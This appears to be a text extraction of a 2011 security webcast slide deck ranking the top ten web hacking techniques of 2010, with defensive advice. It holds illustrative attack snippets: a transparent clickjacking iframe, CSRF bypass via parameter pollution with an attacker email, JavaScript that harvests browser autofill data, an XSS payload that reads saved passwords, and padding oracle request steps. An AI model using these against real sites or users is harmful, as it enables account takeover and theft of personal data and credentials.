Jeremiah GrossmanFounder & Chief Technology Officer

Webcast03.17.2011

© 2011 WhiteHat Security, Inc.

Web Hacking2010

top ten

techniques

© 2010 WhiteHat Security, Inc. | Page

Jeremiah Grossman• WhiteHat Security Founder & CTO

• Technology R&D and industry evangelist

• InfoWorld's CTO Top 25 for 2007

• Co-founder of the Web Application Security Consortium

• Co-author: Cross-Site Scripting Attacks

• Former Yahoo! information security officer

2

4

400+ enterprise customers •Start-ups to Fortune 500

Flagship offering “WhiteHat Sentinel Service”•1000’s of assessments performed annually

Recognized leader in website security•Quoted thousands of times by the mainstream press

5

“Every year the Web security community produces a stunning amount of new hacking techniques published in various white papers, blog posts, magazine articles, mailing list emails, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and so on. Beyond individual vulnerability instances with CVE numbers or system compromises, we're talking about brand new and creative methods of Web-based attack.”

About the Top Ten

6

New Techniques2009 (80)

Creating a rogue CA certificate

2008 (70)GIFAR (GIF + JAR)

2007 (83)XSS Vulnerabilities in Common Shockwave Flash Files

2006 (65)Web Browser Intranet Hacking / Port Scanning

69 new techniques2010

http://jeremiahgrossman.blogspot.com/2011/01/top-ten-web-hacking-techniques-of-2010.html

1) 'Padding Oracle' Crypto Attack2) Evercookie3) Hacking Auto-Complete4) Attacking HTTPS with Cache Injection5) Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution6) Universal XSS in IE87) HTTP POST DoS8) JavaSnoop9) CSS History Hack In Firefox Without JavaScript for Intranet Portscanning10) Java Applet DNS Rebinding

7

Clickjacking is when an attacker invisibly hovers an object (button, link, etc.) below a user's mouse. When the user clicks on something they visually see, they're instead really clicking on something the attacker wanted them to. HTTP Parameter Pollution is where an attacker submits multiple input parameters (query string, post data, cookies, etc.) with the same name. Upon receipt applications may react in unexpected ways and open up avenues of server-side and client-side exploitation. By cleverly leveraging these two former Top Ten attacks, CSRF attacks can be carried out against a user even when recommended token defenses are in use.

Bypassing CSRF with Clickjacking and HTTP Parameter Pollution

8

2

5http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html

Lavakumar Kuppan (@lavakumark)

9

Think of any button – image, link, form, etc. – on any website – that can appear between the Web browser walls. This includes wire transfer on banks, DSL router buttons, Digg buttons, CPC advertising banners, Netflix queue.

Next consider that an attacker can invisibly hover these buttons below the user's mouse, so that when a user clicks on something they visually see, they're actually clicking on something the attacker wants them to.

What could the bad guy do with that ability?

Clickjacking (Top Ten 2009)

<iframe src="http://victim/page.html" scrolling="no"frameborder="0" style="opacity:.1;filter: alpha(opacity=.1); -moz-opacity 1.0;">!

</iframe>

HTML, CSS, and JavaScript may size, follow the mouse and make transparent third-party IFRAME content.

Hover Invisible IFRAMEs

10

11

If an attacker submit multiple input parameters (query string, post data, cookies, etc.) of the same name, the application may react in unexpected ways and open up new avenues of server-side and client-side exploitation.

HTTP Parameter Pollution (HPP) - Top Ten 2009

GET /foo?par1=val1&par1=val2 HTTP/1.1 User-Agent: Mozilla/5.0 Host: Host Accept: */*

POST /foo HTTP/1.1 User-Agent: Mozilla/5.0 Host: Host Accept: */*

par1=val1&par1=val2

POST /index.aspx?par1=val1&par1=val2 HTTP/1.1 User-Agent: Mozilla/5.0 Host: Host Cookie: par1=val3; par1=val4Content-Length: 19

par1=val5&par1=val6

Bizarre behavior

12

13

14

15

void private executeBackendRequest(HTTPRequest request) { String amount=request.getParameter("amount"); String beneficiary=request.getParameter("recipient");

HttpRequest("http://backend.com/servlet/actions","POST", "action=transfer&amount="+amount+"&recipient="+beneficiary);}

Malicious URL:http://target.com/page?amount=1000&recipient=Jeremiah%26action%3dwithdraw

Translates to:action=transfer&amount=1000&recipient=Jeremiah&action=withdraw

It is possible the attack could work if proper authorization controls are not in place and the application uses the last occurrence of the action parameter (IBM Lotus Domino, PHP / Apache, etc.)

Simple parameter injection

16

17

Example Scenariohttp://example/updateEmail.jsp

Client-Side<form method="POST"><input type="text" name="email" value=””></input><input type="hidden" name=”csrf-token” value="a0a0a0a0a0a"/></form>

Server-Sideif (req.parameter("email").isSet() && req.parameter("csrf-token").isValid()) { // process the form and update the email ID} else { // display an empty form to the user (CSRF token included)}

18

Bringing it all together<iframe src=”http://example/updateEmail.jsp?email=evil@attacker.com”>

HTTP request via user submitted form via Clickjacking. The form was not filled out by the victim, meaning the email parameter in the POST body is blank. Now the QueryString contains the attacker entered value for the ‘email’ parameter.

POST /updateEmail.jsp?email=evil@attackermail.com HTTP/1.1Host: www.example.com

email=&csrf-token=a0a0a0a0a0

When the server side JSP code calls req.parameter("email"), the value that is returned is the one in the QueryString (HPP first occurrence) and not the POST body. Since this value can be controlled by the attacker, he can trick the victim in to updating his account with the attacker’s mail ID.

No matter what type of encryption is used to defend a network, sooner or later the password, key, or certificate needs to be stored. If an attacker is able to tamper with the storage mechanism, even the strongest encryption mechanism can fail. The researchers demonstrated how to attack storage mechanisms by tampering with SSL session and break into Wifi networks using WPA. They also showed how to exploit SSL warning inconsistencies and caching mechanisms to trick the user into accepting a bad certs and steal their username & password.

Attacking HTTPS with Cache Injection

19

24

http://www.youtube.com/watch?v=bt0Qh9c59_chttp://elie.im/talks/bad-memories

Elie Bursztein (@ELIE), Baptiste Gourdin (@bapt1ste), Dan Boneh

Public Wifi

Victims

Bad Guycoffee shops, airplanes, corp guest networks

Internet

http://www.bindshell.net/tools/beef/http://airpwn.sourceforge.net/Airpwn.html

HTTP

Airpwn

• Victim(s) located on a RFC 1918 network with a Bad Guy• Bad Guy may take the opportunity to read victim’s Web mail, steal creds, etc.• Bad Guy man-in-the-middles HTTP (Airpwn) to inject IFRAMEs to RFC-1918 IPs• MitM IFRAMEs to include JavaScript malware (BeEF). Or ...• Inject JavaScript malware into popular Web widget URLs. (Ad servers, counters, etc.)• Cache content in the browser for a really long time, beyond current session!

RFC1918 Caching Security - (Top Ten 2009)

21

Situation•43% of the Alexa top 100,000 use external javascript libraries

• Injecting a malicious javascript library into the browser cache allows the attacker to compromise a website protected by SSL

•The malicious library stays in the cache until the user clears it. Moving to a “safe” location doesn’t help

22

Impact•One poisoned injection leads to multiple breaches

•Multiples websites share the same external library such as Google Analytics

• Injecting a malicious version of one of these shared libraries allows the attacker to target all the websites that use it

23

Browser Defense -- sort of•The only defense against cache injection is the SSL warning displayed by the browser when a bad certificate is supplied

•Corner cases that allows an attacker to alter the way SSL certificate warning are displayed

•These alterations make caching attack efficient as the user is more likely to click through the tampered warning

24

Video Demo•The following demos show how caching injection attacks works against Internet Explorer 8 and Firefox 3.6

•These demos were done in real time against real sites with their real certificates

This research encompasses a set of techniques where a malicious website may surreptitiously obtain their visitors names, job title, workplace, physical address, telephone number, email addresses, usernames, passwords, search terms, social security numbers, credit card numbers, and on and on by simulating JavaScript keystroke events in Web browsers HTML form auto-complete / autofill functionality.

Hacking Auto-Complete

25

23

http://jeremiahgrossman.blogspot.com/2010/08/breaking-browsers-hacking-auto-complete.htmlhttp://jeremiahgrossman.blogspot.com/2010/07/i-know-who-your-name-where-you-work-and.htmlhttp://jeremiahgrossman.blogspot.com/2010/09/safari-autofill-hack-lives.htmlhttp://jeremiahgrossman.blogspot.com/2010/07/in-firefox-we-cant-read-auto-complete.html

Jeremiah Grossman (@jeremiahg)

I want to know your name, who you work for, where you live, your email address, etc.Right at the moment you a visit a website. Even if you’ve never been there before, let alone entered information.

26

Safari Address Book Autofill (enabled by default)

<form><input type="text" name="name"><input type="text" name="company"><input type="text" name="city"><input type="text" name="state"><input type="text" name="country"><input type="text" name="email"></form>

27

Address Card Autofill works even when you’ve NEVER entered personal data on ANY WEBSITE.

28

29

Demo

Step 1) Dynamically create input fields with the pre-set attribute names.

Step 2) Cycle through the alphabet initiating text events until a form value populates.

Step 3) Profit! -- Steal data with JavaScript.

var event = document.createEvent('TextEvent');event.initTextEvent('textInput', 1, 1, null, char);

input.value = "";input.selectionStart = 0;input.selectionEnd = 0;input.focus();input.dispatchEvent(event);!!setTimeout(function() { if (input.value.length > 1) { // capture the value; }}, 500);

Safari v4 / v5

*transparency is even more fun!*

Internet Explorer 8 = SAFE

30

AutoComplete: User-supplied form values are shared across different websites by attribute “name”. For example, email addresses entered into a field on website A populates the autofill for the same field name on website B, C, D, etc.

<input type="text" name="email">

31

// hit down arrow an incrementing number of times.// separate with time to allow the GUI to keep pacefor (var i = 1; i <= downs; i++) { time += 30; // time padding keyStroke(this, 40, time); // down button}! !time += 15; // time paddingkeyStroke(this, 13, time); // enter button

// initiate keystroke on a given objectfunction keyStroke(obj, code, t) { //create new event and fire var e = document.createEventObject(); e.keyCode = code; setTimeout(function() {obj.fireEvent("onkeydown", e); }, t);} // end keyStroke

Security Basis, and an Internet Explorer data stealerhttp://webreflection.blogspot.com/2008/09/security-basis-and-internet-explorer.htmlAndrea Giammarchi, Ajaxian Staff

DEMO - Down, Down, Enter

32

Search termsCredit card numbers and CCVsAliasesContact informationAnswers to secret questionsUsernamesEmail addresses...

33

AutoComplete is NOT enabled by default, but Internet Explorer asks if the user if they would like to enable the feature after filling out a non-password form.

34

Have the email address, but need the password

35

Many Web Browsers have “password managers,” which provide a convenient way to save passwords on a “per website” basis.

<form method="post" action="/">E-Mail: <input type="text" name="email"><br />Password: <input type="password" name="pass"><br /><input type="submit" value="Login"></form>

Saving Passwords

36

function stealCreds() { var string = "E-Mail: " + document.getElementById("u").value; string += "\nPassword: " + document.getElementById("p").value; return string;}document.write('<form method="post" action="/">E-Mail: <input id="u" type="text" name="email" value=""><br>Password: <input id="p" type="password" name="password" value=""></form>');

setTimeout('alert(stealCreds())', 2000);

If a website with a saved password is vulnerable to XSS, the payload can dynamically create login forms, which executes the browser’s password auto-complete feature. Since the payload is on the same domain the username / password can be stolen.

DEMO**37

Disable Auto-Complete in the Web browser

Remove persistent data (History, Form Data, Cookies, LocalStorage, etc.)

NoScript (Firefox Extension), 1Password, etc.

<form autocomplete="off"><input type="text" autocomplete="off" />

What to do...

38

http://samy.pl/evercookie/

Samy Kamkar (@samykamkar)

Evercookie is a javascript API available that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. Evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available on the local browser. Additionally, if evercookie has found the user has removed any of the types of cookies in question, it recreates them using each mechanism available.

Evercookie

39

22

40

41

1) Standard HTTP Cookies

2) Flash Cookies (LSOs)

3) Silverlight Isolated Storage

4) Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas tag to read pixels (cookies) back out

5) Storing cookies in Web History

6)window.name caching

Evercookies6) Internet Explorer userData storage

7) Storing cookies in Web cache

8) Storing cookies in HTTP ETags

9) HTML5 Session Storage

10) HTML5 Local Storage

11) HTML5 Global Storage

12) HTML5 Database Storage via SQLite

42

• Persistent cookies via Javascript API

• Recreates after deletion

• Combines different storage mechanisms

• Easy to use!

The API

var ec = new evercookie();

ec.set(“uniqueid”, “31337”); // set uniqueid = 31337

// get our evercookie data backec.get(“uniqueid”, function(val) { alert (“ID is “ + val) } );

43

PNGs CacheCookie stored in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas Tag to read pixels back out

Pixel 0x0 = 0x4f5741 OWAPixel 0x1 = 0x535000 SP\0

44

Killing Evercookies (Video)1) Open a new tab, then close all other windows and tabs.2) Delete Silverlight Isolated Storage• Go to http://www.silverlight.net/• Right click the Silverlight application (any app will do)• Silverlight Preferences > Application Storage > Delete all...• Click "Yes"• * Optionally disable "Enable application storage"3) Delete Flash Local Shared Objects (LSO)• Go got the Flash "Website Storage Settings panel"• Click "Delete all sites"• Click "Confirm"4) Clear Browsing Data• - Wrench > Tools > Clear Browsing Data...• - Select all options• - Clear data from this period: Everything• - Click "Clear Browsing data"

http://singe.za.net/blog/archives/1014-Killing-the-Evercookie.htmlhttp://jeremiahgrossman.blogspot.com/2010/10/killing-evercookie-google-chrome-wo.html

45

Other Protections

•Nevercookie - The evercookie killer

Firefox plugin to extend Firefox’s Private Browsinghttp://nevercookie.anonymizer.com/

•Use a virtual machine. (On your neighbor’s WiFi Network)

46

Other Worries...•System/browser timing

•GPU timing via plugins/accelerators (w/Flash)

•MAC address accessible via Java or ActiveX!

In 2002 a powerful side-channel attack, ‘padding oracle’ (NOT THE DATABASE!), was described targeting AES CBC-mode encryption with PKCS#5 padding. If there is an oracle which on receipt of a ciphertext, decrypts it and replies whether the padding is correct, shows how to use that oracle to decrypt data without knowing the encryption key. The new techniques allow attackers to use a ‘padding oracle’ to decrypt and encrypt messages of any length without knowing the secret key and exploit popular web development frameworks including ASP.NET.

'Padding Oracle' Crypto Attack

47

2

http://usenix.org/events/woot10/tech/full_papers/Rizzo.pdfhttp://netifera.com/research/http://www.gdssecurity.com/l/b/2010/09/14/automated-padding-oracle-attacks-with-padbuster/http://www.youtube.com/watch?v=yghiC_U2RaMhttp://threatpost.com/en_us/blogs/padding-oracle-crypto-attack-affects-millions-aspnet-apps-091310

Juliano Rizzo (@julianor)Thai Duong (@thaidn)

1

48

Brian Holyfieldhttp://www.gdssecurity.com/l/b/2010/09/14/automated-padding-oracle-attacks-with-padbuster/

49

An application uses a query string parameter to pass an encrypted username, company id, and role id of a user. The parameter is encrypted using CBC mode, and each value uses a unique initialization vector (IV) pre-pended to the ciphertext. When the application is sent an encrypted value, it responds in one of three ways:

1)Valid ciphertext, properly padded and valid data (200 OK)2)Invalid ciphertext, improper padding (500 Internal Server Error)3)Valid ciphertext, properly padded and invalid data (200 OK - custom error)

Padding Oracle Attack Basics

User’s name (BRIAN), company id (12), and role id (2). The value, in plaintext, can be represented as BRIAN;12;2;

http://site/app.jsp?UID=7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6

50

51

Encryption

Decryption

52

First block of ciphertext pre-pended with an IV of all NULL values.

Request: http://site/app.jsp?UID=0000000000000000F851D6CC68FC9537Response: 500 - Internal Server Error

53

Last byte of the initialization vector incremented by one.

Request: http://app/home.jsp?UID=0000000000000001F851D6CC68FC9537Response: 500 - Internal Server Error

54

Incrementing the last byte in the IV up to FF will produce a valid padding sequence for a single byte of padding (0×01). Only one value will produce the correct padding byte and have different response than the other 255.

Request: http://site/app?UID=000000000000003CF851D6CC68FC9537Response: 200 OK

If [Intermediary Byte] ^ 0x3C == 0×01,then [Intermediary Byte] == 0x3C ^ 0×01,so [Intermediary Byte] == 0x3D

55

To crack the 7th byte, the 7th and 8th byte must equal 0×02 for valid padding. Since we already know that the last intermediary value byte is 0x3D, we can update the 8th IV byte to 0x3F (which will produce 0×02) and then focus on brute forcing the 7th byte (starting with 0×00 and working our way up through 0xFF).

56

"The first stage of the attack takes a few thousand requests, but once it succeeds and the attacker gets the secret keys, it's totally

stealthy.The cryptographic knowledge required is very basic." - Julian Rizzo

Work backwards through the entire block until every byte of the intermediary value is cracked and uncovering the decrypted value one byte at a time. The final byte is cracked using an IV that produces an entire block of just padding (0×08).

57

<VIDEO>

"It turns out that the vulnerability in ASP.NET is the most critical amongst other frameworks. In short, it totally destroys ASP.NET security,"

-Thai Duong

58

Vulnerable FrameworksASP.Net, CAPTCHAs, JavaServer Faces, OWASP ESAPI, Ruby On Rails, etc.

Prevention•Encrypt-then-MAC (sign) and validate-then-decrypt•Patch!

Impact & Prevention

59

•Encryption attacks took the top spot for the 2nd year in a row.

•Web Browser privacy? Web browser security? Not so much.

• “Top Ten” attacks from previous years are being improved.

•Several attack techniques from previous years are now actively being used maliciously in the wild.

What have we learned?

60

Blog: http://jeremiahgrossman.blogspot.com/Twitter: http://twitter.com/jeremiahgEmail: jeremiah@whitehatsec.com

Thank You...•Sponsors: OWASP, Black Hat, WhiteHat

Security•Panel of Experts: Ed Skoudis, Giorgio

Maone, Caleb Sima, Chris Wysopal, Jeff Willams, Charlie Miller, Dan Kaminsky, Steven Christey (Mitre), and Arian Evans

•All the security researchers for their contributions

•Everyone in the Web Application Security community who assisted